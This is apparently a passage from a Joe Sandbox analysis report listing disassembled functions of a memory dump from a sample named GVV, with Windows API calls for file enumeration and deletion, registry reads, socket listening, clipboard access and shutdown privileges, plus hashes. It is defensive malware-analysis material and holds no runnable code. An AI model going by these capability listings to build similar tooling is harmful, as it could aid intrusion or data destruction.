                • Instruction ID: 860757b2c9438159f80cc2be90d92d6d0a2108860df58ade0bfcf079eede4843
                • Opcode Fuzzy Hash: 674e4d6479db7568c7db4e048b22297fedbf6a25014df2c637d455938bed1290
                • Instruction Fuzzy Hash: 14D15072508300AFC314EBA4D891EABB7FCAF98704F04492DF595D7291EB74DA45CBA2
                Uniqueness

                Uniqueness Score: -1.00%

                APIs
                • FindFirstFileW.KERNEL32(?,?,76228FB0,?,00000000), ref: 00189663
                • GetFileAttributesW.KERNEL32(?), ref: 001896A1
                • SetFileAttributesW.KERNEL32(?,?), ref: 001896BB
                • FindNextFileW.KERNEL32(00000000,?), ref: 001896D3
                • FindClose.KERNEL32(00000000), ref: 001896DE
                • FindFirstFileW.KERNEL32(*.*,?), ref: 001896FA
                • SetCurrentDirectoryW.KERNEL32(?), ref: 0018974A
                • SetCurrentDirectoryW.KERNEL32(001D6B7C), ref: 00189768
                • FindNextFileW.KERNEL32(00000000,00000010), ref: 00189772
                • FindClose.KERNEL32(00000000), ref: 0018977F
                • FindClose.KERNEL32(00000000), ref: 0018978F
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.3889730927.0000000000111000.00000020.00000001.01000000.00000003.sdmp, Offset: 00110000, based on PE: true
                • Associated: 00000000.00000002.3889717556.0000000000110000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.3889783916.00000000001AC000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.3889783916.00000000001D2000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.3889827683.00000000001DC000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.3889842438.00000000001E4000.00000002.00000001.01000000.00000003.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_110000_GVV.jbxd
                Similarity
                • API ID: Find$File$Close$AttributesCurrentDirectoryFirstNext
                • String ID: *.*
                • API String ID: 1409584000-438819550
                • Opcode ID: d7de3fb32d8600918ca75445c70637e104f9c888270ede788a44752b21acb726
                • Instruction ID: a4637fc1c21c7eca59beba0b2a60a4c9595e5db1f02c179cf444383f2b2e6c8c
                • Opcode Fuzzy Hash: d7de3fb32d8600918ca75445c70637e104f9c888270ede788a44752b21acb726
                • Instruction Fuzzy Hash: C131A4326412197EDF14EFB4DC49AEE77ACAF4A320F184156F815E2191EB34DE848F94
                Uniqueness

                Uniqueness Score: -1.00%

                APIs
                • FindFirstFileW.KERNEL32(?,?,76228FB0,?,00000000), ref: 001897BE
                • FindNextFileW.KERNEL32(00000000,?), ref: 00189819
                • FindClose.KERNEL32(00000000), ref: 00189824
                • FindFirstFileW.KERNEL32(*.*,?), ref: 00189840
                • SetCurrentDirectoryW.KERNEL32(?), ref: 00189890
                • SetCurrentDirectoryW.KERNEL32(001D6B7C), ref: 001898AE
                • FindNextFileW.KERNEL32(00000000,00000010), ref: 001898B8
                • FindClose.KERNEL32(00000000), ref: 001898C5
                • FindClose.KERNEL32(00000000), ref: 001898D5
                  • Part of subcall function 0017DAE5: CreateFileW.KERNEL32(?,40000000,00000001,00000000,00000003,02000080,00000000), ref: 0017DB00
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.3889730927.0000000000111000.00000020.00000001.01000000.00000003.sdmp, Offset: 00110000, based on PE: true
                • Associated: 00000000.00000002.3889717556.0000000000110000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.3889783916.00000000001AC000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.3889783916.00000000001D2000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.3889827683.00000000001DC000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.3889842438.00000000001E4000.00000002.00000001.01000000.00000003.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_110000_GVV.jbxd
                Similarity
                • API ID: Find$File$Close$CurrentDirectoryFirstNext$Create
                • String ID: *.*
                • API String ID: 2640511053-438819550
                • Opcode ID: d581cacaed04675afe57595a18f61817a4d3b16e38453ad5fe4d387c589d2a7c
                • Instruction ID: 064708573c1c93dfb7c35a34a4556df1af8edc297421abb2a07367a56f77f145
                • Opcode Fuzzy Hash: d581cacaed04675afe57595a18f61817a4d3b16e38453ad5fe4d387c589d2a7c
                • Instruction Fuzzy Hash: 7931A13160061E6EDF10AFB4EC48AEE77ADAF07324F184166E854A2191DB30DE848FA0
                Uniqueness

                Uniqueness Score: -1.00%

                APIs
                  • Part of subcall function 0019C998: CharUpperBuffW.USER32(?,?,?,?,?,?,?,0019B6AE,?,?), ref: 0019C9B5
                  • Part of subcall function 0019C998: _wcslen.LIBCMT ref: 0019C9F1
                  • Part of subcall function 0019C998: _wcslen.LIBCMT ref: 0019CA68
                  • Part of subcall function 0019C998: _wcslen.LIBCMT ref: 0019CA9E
                • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 0019BF3E
                • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?,?,?), ref: 0019BFA9
                • RegCloseKey.ADVAPI32(00000000), ref: 0019BFCD
                • RegQueryValueExW.ADVAPI32(?,?,00000000,?,00000000,?), ref: 0019C02C
                • RegQueryValueExW.ADVAPI32(?,?,00000000,00000000,?,00000008), ref: 0019C0E7
                • RegQueryValueExW.ADVAPI32(?,?,00000000,00000000,?,?,?,00000000), ref: 0019C154
                • RegQueryValueExW.ADVAPI32(?,?,00000000,00000000,?,?,?,00000000), ref: 0019C1E9
                • RegQueryValueExW.ADVAPI32(?,?,00000000,00000000,00000000,?,?,?,00000000), ref: 0019C23A
                • RegQueryValueExW.ADVAPI32(?,?,00000000,00000000,?,?,?,00000000), ref: 0019C2E3
                • RegCloseKey.ADVAPI32(?,?,00000000), ref: 0019C382
                • RegCloseKey.ADVAPI32(00000000), ref: 0019C38F
                Memory Dump Source
                • Source File: 00000000.00000002.3889730927.0000000000111000.00000020.00000001.01000000.00000003.sdmp, Offset: 00110000, based on PE: true
                • Associated: 00000000.00000002.3889717556.0000000000110000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.3889783916.00000000001AC000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.3889783916.00000000001D2000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.3889827683.00000000001DC000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.3889842438.00000000001E4000.00000002.00000001.01000000.00000003.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_110000_GVV.jbxd
                Similarity
                • API ID: QueryValue$Close_wcslen$BuffCharConnectOpenRegistryUpper
                • String ID:
                • API String ID: 3102970594-0
                • Opcode ID: a7272459ee02edae22398f952e1d88138ee1e43e2db19bbf3e3d45569b144dfb
                • Instruction ID: 3b3cc0d60b28e07e3c3e417f16c2e7ee64d638360f946462b839d783c427b676
                • Opcode Fuzzy Hash: a7272459ee02edae22398f952e1d88138ee1e43e2db19bbf3e3d45569b144dfb
                • Instruction Fuzzy Hash: 3C025E716042009FDB14DF28C895E2ABBE5FF49314F1984ADF48ACB2A2D731ED45CB91
                Uniqueness

                Uniqueness Score: -1.00%

                APIs
                • GetLocalTime.KERNEL32(?), ref: 00188257
                • SystemTimeToFileTime.KERNEL32(?,?), ref: 00188267
                • LocalFileTimeToFileTime.KERNEL32(?,?), ref: 00188273
                • GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 00188310
                • SetCurrentDirectoryW.KERNEL32(?), ref: 00188324
                • SetCurrentDirectoryW.KERNEL32(?), ref: 00188356
                • SetCurrentDirectoryW.KERNEL32(?,?,?,?,?), ref: 0018838C
                • SetCurrentDirectoryW.KERNEL32(?), ref: 00188395
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.3889730927.0000000000111000.00000020.00000001.01000000.00000003.sdmp, Offset: 00110000, based on PE: true
                • Associated: 00000000.00000002.3889717556.0000000000110000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.3889783916.00000000001AC000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.3889783916.00000000001D2000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.3889827683.00000000001DC000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.3889842438.00000000001E4000.00000002.00000001.01000000.00000003.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_110000_GVV.jbxd
                Similarity
                • API ID: CurrentDirectoryTime$File$Local$System
                • String ID: *.*
                • API String ID: 1464919966-438819550
                • Opcode ID: 33d06938c3bf24ba871320b6ab4287cd03d4bbaba1aefdf7ba629b34b076dc69
                • Instruction ID: 5815347096710b43d4e257a04f5b73b7830225ef7e513109cdc7bb94239495f2
                • Opcode Fuzzy Hash: 33d06938c3bf24ba871320b6ab4287cd03d4bbaba1aefdf7ba629b34b076dc69
                • Instruction Fuzzy Hash: 0E617D715043059FCB14EF64D8809AEB3E9FF99310F44892EF99987251EB31EA45CF92
                Uniqueness

                Uniqueness Score: -1.00%

                APIs
                  • Part of subcall function 00113AA2: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00113A97,?,?,00112E7F,?,?,?,00000000), ref: 00113AC2
                  • Part of subcall function 0017E199: GetFileAttributesW.KERNEL32(?,0017CF95), ref: 0017E19A
                • FindFirstFileW.KERNEL32(?,?), ref: 0017D122
                • DeleteFileW.KERNEL32(?,?,?,?,?,00000000,?,?,?), ref: 0017D1DD
                • MoveFileW.KERNEL32(?,?), ref: 0017D1F0
                • DeleteFileW.KERNEL32(?,?,?,?), ref: 0017D20D
                • FindNextFileW.KERNEL32(00000000,00000010), ref: 0017D237
                  • Part of subcall function 0017D29C: CopyFileExW.KERNEL32(?,?,00000000,00000000,00000000,00000008,?,?,0017D21C,?,?), ref: 0017D2B2
                • FindClose.KERNEL32(00000000,?,?,?), ref: 0017D253
                • FindClose.KERNEL32(00000000), ref: 0017D264
                Memory Dump Source
                • Source File: 00000000.00000002.3889730927.0000000000111000.00000020.00000001.01000000.00000003.sdmp, Offset: 00110000, based on PE: true
                • Associated: 00000000.00000002.3889717556.0000000000110000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.3889783916.00000000001AC000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.3889783916.00000000001D2000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.3889827683.00000000001DC000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.3889842438.00000000001E4000.00000002.00000001.01000000.00000003.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_110000_GVV.jbxd
                Similarity
                • API ID: File$Find$CloseDelete$AttributesCopyFirstFullMoveNameNextPath
                • String ID: \*.*
                • API String ID: 1946585618-1173974218
                • Opcode ID: 1c543746a1130968794cd3406c157618de54c17133fb5dd3e40bed746a68cc05
                • Instruction ID: 249d4ed3855ed6294a9e54d1a8356b485800cebcc633c6c48e929514d675598a
                • Opcode Fuzzy Hash: 1c543746a1130968794cd3406c157618de54c17133fb5dd3e40bed746a68cc05
                • Instruction Fuzzy Hash: 82618031C0110D9FCF09EBE0E9929EDB7B5AF25300F648165E41A77192EB316F8ADB60
                Uniqueness

                Uniqueness Score: -1.00%

                Memory Dump Source
                • Source File: 00000000.00000002.3889730927.0000000000111000.00000020.00000001.01000000.00000003.sdmp, Offset: 00110000, based on PE: true
                • Associated: 00000000.00000002.3889717556.0000000000110000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.3889783916.00000000001AC000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.3889783916.00000000001D2000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.3889827683.00000000001DC000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.3889842438.00000000001E4000.00000002.00000001.01000000.00000003.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_110000_GVV.jbxd
                Similarity
                • API ID: Clipboard$AllocCloseEmptyGlobalOpen
                • String ID:
                • API String ID: 1737998785-0
                • Opcode ID: 24153c2e69e52cd6ee68103a9b4b90cf289cf7f002ff2d60a81be3e61374a94c
                • Instruction ID: 0ba3ca4efa7bd7a3ee26e6a0eceae3fc7df23a97e82624014efb25f086e319ba
                • Opcode Fuzzy Hash: 24153c2e69e52cd6ee68103a9b4b90cf289cf7f002ff2d60a81be3e61374a94c
                • Instruction Fuzzy Hash: F6419A75204611AFE324EF55D888B59BBE1EF45328F14C099E4198BBA2C735ED82CFD0
                Uniqueness

                Uniqueness Score: -1.00%

                APIs
                  • Part of subcall function 001716C3: LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 0017170D
                  • Part of subcall function 001716C3: AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 0017173A
                  • Part of subcall function 001716C3: GetLastError.KERNEL32 ref: 0017174A
                • ExitWindowsEx.USER32(?,00000000), ref: 0017E932
                Memory Dump Source
                • Source File: 00000000.00000002.3889730927.0000000000111000.00000020.00000001.01000000.00000003.sdmp, Offset: 00110000, based on PE: true
                • Associated: 00000000.00000002.3889717556.0000000000110000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.3889783916.00000000001AC000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.3889783916.00000000001D2000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.3889827683.00000000001DC000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.3889842438.00000000001E4000.00000002.00000001.01000000.00000003.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_110000_GVV.jbxd
                Similarity
                • API ID: AdjustErrorExitLastLookupPrivilegePrivilegesTokenValueWindows
                • String ID: $ $@$SeShutdownPrivilege
                • API String ID: 2234035333-3163812486
                • Opcode ID: 11ef1f9b1ba556b5b10173260f20584e08cbc32cf3e21131a4d51c0c5f8d6d9f
                • Instruction ID: 13fefa59b1bec97063175a90715ec019feb0704ccbfbde8efaf926a7b3d360d8
                • Opcode Fuzzy Hash: 11ef1f9b1ba556b5b10173260f20584e08cbc32cf3e21131a4d51c0c5f8d6d9f
                • Instruction Fuzzy Hash: 0B01FE73610211BFEB5826789C85FBF72FC9718758F158462FE07E21D1D7A05C4086D0
                Uniqueness

                Uniqueness Score: -1.00%

                APIs
                • socket.WSOCK32(00000002,00000001,00000006,?,00000002,00000000), ref: 00191276
                • WSAGetLastError.WSOCK32 ref: 00191283
                • bind.WSOCK32(00000000,?,00000010), ref: 001912BA
                • WSAGetLastError.WSOCK32 ref: 001912C5
                • closesocket.WSOCK32(00000000), ref: 001912F4
                • listen.WSOCK32(00000000,00000005), ref: 00191303
                • WSAGetLastError.WSOCK32 ref: 0019130D
                • closesocket.WSOCK32(00000000), ref: 0019133C
                Memory Dump Source
                • Source File: 00000000.00000002.3889730927.0000000000111000.00000020.00000001.01000000.00000003.sdmp, Offset: 00110000, based on PE: true
                • Associated: 00000000.00000002.3889717556.0000000000110000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.3889783916.00000000001AC000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.3889783916.00000000001D2000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.3889827683.00000000001DC000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.3889842438.00000000001E4000.00000002.00000001.01000000.00000003.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_110000_GVV.jbxd
                Similarity
                • API ID: ErrorLast$closesocket$bindlistensocket
                • String ID:
                • API String ID: 540024437-0
                • Opcode ID: 9534c7840be6d7185cae541f43e6e352be85de5a9609a447a64b3316dd0262ca
                • Instruction ID: b2844605976bed82aaee557656fa849159e733df659a262f6bec3a7b004750fe
                • Opcode Fuzzy Hash: 9534c7840be6d7185cae541f43e6e352be85de5a9609a447a64b3316dd0262ca
                • Instruction Fuzzy Hash: B6417331600101AFDB14EF64D484B69BBE6BF46314F288198D8569F2D2C775EDC1CBE1
                Uniqueness

                Uniqueness Score: -1.00%

                APIs
                • _free.LIBCMT ref: 0014B9D4
                • _free.LIBCMT ref: 0014B9F8
                • _free.LIBCMT ref: 0014BB7F
                • GetTimeZoneInformation.KERNEL32(?,00000000,00000000,00000000,?,001B3700), ref: 0014BB91
                • WideCharToMultiByte.KERNEL32(00000000,00000000,001E121C,000000FF,00000000,0000003F,00000000,?,?), ref: 0014BC09
                • WideCharToMultiByte.KERNEL32(00000000,00000000,001E1270,000000FF,?,0000003F,00000000,?), ref: 0014BC36
                • _free.LIBCMT ref: 0014BD4B
                Memory Dump Source
                • Source File: 00000000.00000002.3889730927.0000000000111000.00000020.00000001.01000000.00000003.sdmp, Offset: 00110000, based on PE: true
                • Associated: 00000000.00000002.3889717556.0000000000110000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.3889783916.00000000001AC000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.3889783916.00000000001D2000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.3889827683.00000000001DC000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.3889842438.00000000001E4000.00000002.00000001.01000000.00000003.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_110000_GVV.jbxd
                Similarity
                • API ID: _free$ByteCharMultiWide$InformationTimeZone
                • String ID:
                • API String ID: 314583886-0
                • Opcode ID: a31cfc6808c2c5d9f693d62228fc7121d4f32343781f376df0174733703db1fa
                • Instruction ID: eb85d6af63f4e84b98098842a537886d681a536d09b12fc70ae7284b335d6e61
                • Opcode Fuzzy Hash: a31cfc6808c2c5d9f693d62228fc7121d4f32343781f376df0174733703db1fa
                • Instruction Fuzzy Hash: FBC11671A08245AFDB249F69CCC1AAE7BB9EF51310F2441AAE594DB271E730DE41C750
                Uniqueness

                Uniqueness Score: -1.00%

                APIs
                  • Part of subcall function 00113AA2: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00113A97,?,?,00112E7F,?,?,?,00000000), ref: 00113AC2
                  • Part of subcall function 0017E199: GetFileAttributesW.KERNEL32(?,0017CF95), ref: 0017E19A
                • FindFirstFileW.KERNEL32(?,?), ref: 0017D420
                • DeleteFileW.KERNEL32(?,?,?,?), ref: 0017D470
                • FindNextFileW.KERNEL32(00000000,00000010), ref: 0017D481
                • FindClose.KERNEL32(00000000), ref: 0017D498
                • FindClose.KERNEL32(00000000), ref: 0017D4A1
                Memory Dump Source
                • Source File: 00000000.00000002.3889730927.0000000000111000.00000020.00000001.01000000.00000003.sdmp, Offset: 00110000, based on PE: true
                • Associated: 00000000.00000002.3889717556.0000000000110000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.3889783916.00000000001AC000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.3889783916.00000000001D2000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.3889827683.00000000001DC000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.3889842438.00000000001E4000.00000002.00000001.01000000.00000003.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_110000_GVV.jbxd
                Similarity
                • API ID: FileFind$Close$AttributesDeleteFirstFullNameNextPath
                • String ID: \*.*
                • API String ID: 2649000838-1173974218
                • Opcode ID: 79d139cf2bff019e1fb6c1e8d18d06f5afc61f81b8dea65d4552642f87d45777
                • Instruction ID: 7f5dab3ed47acd3ba68eb6ff6ba3b8235c67df66f06e3733a3b8bed6556596d2
                • Opcode Fuzzy Hash: 79d139cf2bff019e1fb6c1e8d18d06f5afc61f81b8dea65d4552642f87d45777
                • Instruction Fuzzy Hash: A43172710083459BC304EF64D8559EF77F8BEA1314F44892EF4E653191EB30AA49C763
                Uniqueness

                Uniqueness Score: -1.00%

                Memory Dump Source
                • Source File: 00000000.00000002.3889730927.0000000000111000.00000020.00000001.01000000.00000003.sdmp, Offset: 00110000, based on PE: true
                • Associated: 00000000.00000002.3889717556.0000000000110000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.3889783916.00000000001AC000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.3889783916.00000000001D2000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.3889827683.00000000001DC000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.3889842438.00000000001E4000.00000002.00000001.01000000.00000003.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_110000_GVV.jbxd
                Similarity
                • API ID: __floor_pentium4
                • String ID: 1#IND$1#INF$1#QNAN$1#SNAN
                • API String ID: 4168288129-2761157908
                • Opcode ID: f16057342bca6c4a321d9427c01a307ef046ca838227fa43509691abffb416cf
                • Instruction ID: 14b0d34e7f034e11cff761f7e78ff6c4e3de371a53b3243b3896b16b84c6e434
                • Opcode Fuzzy Hash: f16057342bca6c4a321d9427c01a307ef046ca838227fa43509691abffb416cf
                • Instruction Fuzzy Hash: 8BC21872E046298FDB29CE28DD407EAB7B5FB48315F1541EAD84DE7250E774AE828F40
                Uniqueness

                Uniqueness Score: -1.00%

                APIs
                • _wcslen.LIBCMT ref: 001864DC
                • CoInitialize.OLE32(00000000), ref: 00186639
                • CoCreateInstance.OLE32(001AFCF8,00000000,00000001,001AFB68,?), ref: 00186650
                • CoUninitialize.OLE32 ref: 001868D4
                Memory Dump Source
                • Source File: 00000000.00000002.3889730927.0000000000111000.00000020.00000001.01000000.00000003.sdmp, Offset: 00110000, based on PE: true
                • Associated: 00000000.00000002.3889717556.0000000000110000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.3889783916.00000000001AC000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.3889783916.00000000001D2000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.3889827683.00000000001DC000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.3889842438.00000000001E4000.00000002.00000001.01000000.00000003.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_110000_GVV.jbxd
                Similarity
                • API ID: CreateInitializeInstanceUninitialize_wcslen
                • String ID: .lnk
                • API String ID: 886957087-24824748
                • Opcode ID: e69bfdf743970960485ad2195f4bbf870e7eb5c5e8b3d33ad1fcbd63c392fce1
                • Instruction ID: 7af5b624201eb83a0db992ed11020af79c16529e71865df17c9a6aecf521c659
                • Opcode Fuzzy Hash: e69bfdf743970960485ad2195f4bbf870e7eb5c5e8b3d33ad1fcbd63c392fce1
                • Instruction Fuzzy Hash: 7BD14A715083019FC304EF24C891AABB7E8FFA9744F10496DF5958B291EB71EE46CB92
                Uniqueness

                Uniqueness Score: -1.00%

                APIs
                • GetForegroundWindow.USER32(?,?,00000000), ref: 001922E8
                  • Part of subcall function 0018E4EC: GetWindowRect.USER32(?,?), ref: 0018E504
                • GetDesktopWindow.USER32 ref: 00192312
                • GetWindowRect.USER32(00000000), ref: 00192319
                • mouse_event.USER32(00008001,?,?,00000002,00000002), ref: 00192355
                • GetCursorPos.USER32(?), ref: 00192381
                • mouse_event.USER32(00008001,?,?,00000000,00000000), ref: 001923DF
                Memory Dump Source
                • Source File: 00000000.00000002.3889730927.0000000000111000.00000020.00000001.01000000.00000003.sdmp, Offset: 00110000, based on PE: true
                • Associated: 00000000.00000002.3889717556.0000000000110000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.3889783916.00000000001AC000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.3889783916.00000000001D2000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.3889827683.00000000001DC000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.3889842438.00000000001E4000.00000002.00000001.01000000.00000003.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_110000_GVV.jbxd
                Similarity
                • API ID: Window$Rectmouse_event$CursorDesktopForeground
                • String ID:
                • API String ID: 2387181109-0
                • Opcode ID: 267a2d327c724d11495ff4f45ccb4960f8f965c21c6180f410fd0d7442ecbec3
                • Instruction ID: 577f51f1174cfa3bb84db8c5874f60dcdc0220c84ef05a173273cf93bcc45856
                • Opcode Fuzzy Hash: 267a2d327c724d11495ff4f45ccb4960f8f965c21c6180f410fd0d7442ecbec3
                • Instruction Fuzzy Hash: 3031C272505315AFDB20DF54C849B9BB7E9FF89314F000919F98997191DB34EA48CBD2
                Uniqueness

                Uniqueness Score: -1.00%

                APIs
                  • Part of subcall function 00119CB3: _wcslen.LIBCMT ref: 00119CBD
                • FindFirstFileW.KERNEL32(00000001,?,*.*,?,?,00000000,00000000), ref: 00189B78
                • FindClose.KERNEL32(00000000,?,00000000,00000000), ref: 00189C8B
                  • Part of subcall function 00183874: GetInputState.USER32 ref: 001838CB
                  • Part of subcall function 00183874: PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00183966
                • Sleep.KERNEL32(0000000A,?,00000000,00000000), ref: 00189BA8
                • FindNextFileW.KERNEL32(?,?,?,00000000,00000000), ref: 00189C75
                Memory Dump Source
                • Source File: 00000000.00000002.3889730927.0000000000111000.00000020.00000001.01000000.00000003.sdmp, Offset: 00110000, based on PE: true
                • Associated: 00000000.00000002.3889717556.0000000000110000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.3889783916.00000000001AC000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.3889783916.00000000001D2000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.3889827683.00000000001DC000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.3889842438.00000000001E4000.00000002.00000001.01000000.00000003.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_110000_GVV.jbxd
                Similarity
                • API ID: Find$File$CloseFirstInputMessageNextPeekSleepState_wcslen
                • String ID: *.*
                • API String ID: 1972594611-438819550
                • Opcode ID: f5b8b16930cacd70239bbca15fcc6980de572325bcc45b21245f793b1785cc23
                • Instruction ID: d8d7a7b5bf8ef29697e4c711216ed4b4cbe23da46118abfa26d533a05b4ae43c
                • Opcode Fuzzy Hash: f5b8b16930cacd70239bbca15fcc6980de572325bcc45b21245f793b1785cc23
                • Instruction Fuzzy Hash: 6C41637190420A9FCF15EF64C945AEE7BB4FF55310F184156E815A6191EB319F84CFA0
                Uniqueness

                Uniqueness Score: -1.00%

                APIs
                  • Part of subcall function 00129BA1: GetWindowLongW.USER32(00000000,000000EB), ref: 00129BB2
                • DefDlgProcW.USER32(?,?,?,?,?), ref: 00129A4E
                • GetSysColor.USER32(0000000F), ref: 00129B23
                • SetBkColor.GDI32(?,00000000), ref: 00129B36
                Memory Dump Source
                • Source File: 00000000.00000002.3889730927.0000000000111000.00000020.00000001.01000000.00000003.sdmp, Offset: 00110000, based on PE: true
                • Associated: 00000000.00000002.3889717556.0000000000110000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.3889783916.00000000001AC000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.3889783916.00000000001D2000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.3889827683.00000000001DC000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.3889842438.00000000001E4000.00000002.00000001.01000000.00000003.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_110000_GVV.jbxd
                Similarity
                • API ID: Color$LongProcWindow
                • String ID:
                • API String ID: 3131106179-0
                • Opcode ID: 7b1bd7d4832322ddb91c9aee93c4d9d3c73535949c02e5ebb555f7bb05524239
                • Instruction ID: e4820dc587760f44cd21935e0b1b126354799325443896489b0bae72942952ba
                • Opcode Fuzzy Hash: 7b1bd7d4832322ddb91c9aee93c4d9d3c73535949c02e5ebb555f7bb05524239
                • Instruction Fuzzy Hash: B6A10870208564BFE728AA3CAC98E7F369DEF43358F164109F502DB9D1CB259DA1D271
                Uniqueness

                Uniqueness Score: -1.00%

                APIs
                  • Part of subcall function 0019304E: inet_addr.WSOCK32(?,?,?,?,?,00000000), ref: 0019307A
                  • Part of subcall function 0019304E: _wcslen.LIBCMT ref: 0019309B
                • socket.WSOCK32(00000002,00000002,00000011,?,?,00000000), ref: 0019185D
                • WSAGetLastError.WSOCK32 ref: 00191884
                • bind.WSOCK32(00000000,?,00000010), ref: 001918DB
                • WSAGetLastError.WSOCK32 ref: 001918E6
                • closesocket.WSOCK32(00000000), ref: 00191915
                Memory Dump Source
                • Source File: 00000000.00000002.3889730927.0000000000111000.00000020.00000001.01000000.00000003.sdmp, Offset: 00110000, based on PE: true
                • Associated: 00000000.00000002.3889717556.0000000000110000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.3889783916.00000000001AC000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.3889783916.00000000001D2000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.3889827683.00000000001DC000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.3889842438.00000000001E4000.00000002.00000001.01000000.00000003.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_110000_GVV.jbxd
                Similarity
                • API ID: ErrorLast$_wcslenbindclosesocketinet_addrsocket
                • String ID:
                • API String ID: 1601658205-0
